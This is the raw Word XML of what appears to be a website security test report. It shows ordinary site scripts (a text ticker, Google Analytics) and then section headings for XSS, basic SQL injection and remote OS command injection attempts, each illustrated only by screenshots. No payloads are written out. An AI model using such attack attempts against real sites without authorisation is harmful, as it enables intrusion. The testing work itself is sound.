          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A7547" w14:textId="77777777"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t xml:space="preserve">                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E41F678" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>rotateTicker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(){                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13990C9F" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> i == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>tickerItems.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ){ i = 0; }                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7185FDFC" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>tickerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>tickerItems</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[i];                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D9EAA" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">c = 0;                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546CABCF" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>typetext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">);                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68080C0C" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>rotateTicker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">()", 9434 );                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C31F20" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">i++;                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338DBE48" w14:textId="77777777"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t xml:space="preserve">}         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC997B6" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE0CDD" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  (i[r].q=i[r].q|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>|[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>]).push(arguments)},i[r].l=1*new Date();a=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>s.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(o),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D05BC5" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  m=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>s.getElementsByTagName(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D541B" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>})(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window,document,'script','https://www.google-analytics.com/analytics.js','ga');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D706AD9" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'create', 'UA-82764653-1', 'auto');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBFD4E8" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'send', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>pageview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1657AC77" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;/script&gt;&lt;script type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FFF29" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/* &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CDATA[ */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156CAF00" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> tie = {"mobile_menu_active":"true","mobile_menu_top":"true","lightbox_all":"true","lightbox_gallery":"true","woocommerce_lightbox":"yes","lightbox_skin":"dark","lightbox_thumb":"vertical","lightbox_arrows":"true","sticky_sidebar":"1","is_singular":"1","SmothScroll":"true","reading_indicator":"","lang_no_results":"No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Results","lang_results_found":"Results</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Found"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05824415" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="00A35A0D" w:rsidRDefault="005B1BB0" w:rsidP="001B121C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/* ]]&gt; */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A8C21" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="00F05BE8" w:rsidP="00F05BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XSS Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EB82A" w14:textId="77777777" w:rsidR="00F05BE8" w:rsidRDefault="00F05BE8" w:rsidP="00F05BE8"/>
    <w:p w14:paraId="1DCBE592" w14:textId="77777777" w:rsidR="00F05BE8" w:rsidRDefault="00F05BE8" w:rsidP="00CC1C29">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F419B3" wp14:editId="368AA9D1">
            <wp:extent cx="6114197" cy="3760237"/>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XSS Protection.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="13961"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6166651" cy="3792496"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3232E25D" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="6522D8D5" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="04E5556C" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="6D0AD53E" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="53A39087" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="44EC5F30" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="3B0C8D9A" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="6BA12CA0" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="2139F49B" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="4769A929" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="3B8B7558" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="70217693" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="4ECEDBCA" w14:textId="77777777" w:rsidR="00CC1C29" w:rsidRDefault="00CC1C29" w:rsidP="00667DEF"/>
    <w:p w14:paraId="70D2ADEB" w14:textId="77777777" w:rsidR="00667DEF" w:rsidRDefault="00667DEF" w:rsidP="00CC1C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1036"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection (Basic Attempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6712E5" w14:textId="77777777" w:rsidR="00667DEF" w:rsidRDefault="00667DEF" w:rsidP="00CC1C29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A17CD7" wp14:editId="4E3EE346">
            <wp:extent cx="3282287" cy="2893613"/>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ups attack 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="33892" b="1913"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3389325" cy="2987976"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="564CC537" w14:textId="77777777" w:rsidR="00667DEF" w:rsidRDefault="00667DEF" w:rsidP="00667DEF"/>
    <w:p w14:paraId="5A36A9A4" w14:textId="77777777" w:rsidR="00667DEF" w:rsidRDefault="00667DEF" w:rsidP="00667DEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DA1E3D9" wp14:editId="26AEE4F5">
            <wp:extent cx="6114197" cy="1294496"/>
            <wp:effectExtent l="0" t="0" r="127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ups attack.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId24">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="15593"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6199901" cy="1312641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16F089" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1036"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Remote OS Command Injection (Attempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5116B08E" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1036"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11325F55" w14:textId="77777777" w:rsidR="00976736" w:rsidRDefault="00A446EC" w:rsidP="00CC1C29">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1036"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00976736">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E925EC7" wp14:editId="704AAE9D">
            <wp:extent cx="4353636" cy="3545611"/>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S Injection Attempt.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId25" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="33327"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4370147" cy="3559058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
